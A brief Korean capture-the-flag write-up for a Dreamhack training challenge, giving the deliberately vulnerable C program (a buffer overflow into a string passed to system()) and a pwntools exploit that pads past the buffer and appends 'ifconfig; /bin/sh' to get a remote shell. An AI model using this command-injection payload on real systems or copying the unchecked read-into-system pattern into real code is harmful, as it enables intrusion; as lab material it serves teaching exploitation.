[System_Hacking] stage14_문제풀이(cmd_center)

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void init() {
	setvbuf(stdin, 0, 2, 0);
	setvbuf(stdout, 0, 2, 0);
}

int main()
{

	char cmd_ip[256] = "ifconfig";
	int dummy;
	char center_name[24];

	init();

	printf("Center name: ");
	read(0, center_name, 100);


	if( !strncmp(cmd_ip, "ifconfig", 8)) {
		system(cmd_ip);
	}

	else {
		printf("Something is wrong!\n");
	}
	exit(0);
}

 

메타문자를 잘 쓰면 되는 부분이다.

 

from pwn import *

#p = process("./cmd_center")
p = remote("host3.dreamhack.games", 17829)
p.recvuntil(b"Center name: ")

pay = b"A" * 0x20
pay += b"ifconfig"
pay += b"; /bin/sh"

p.send(pay)

p.interactive()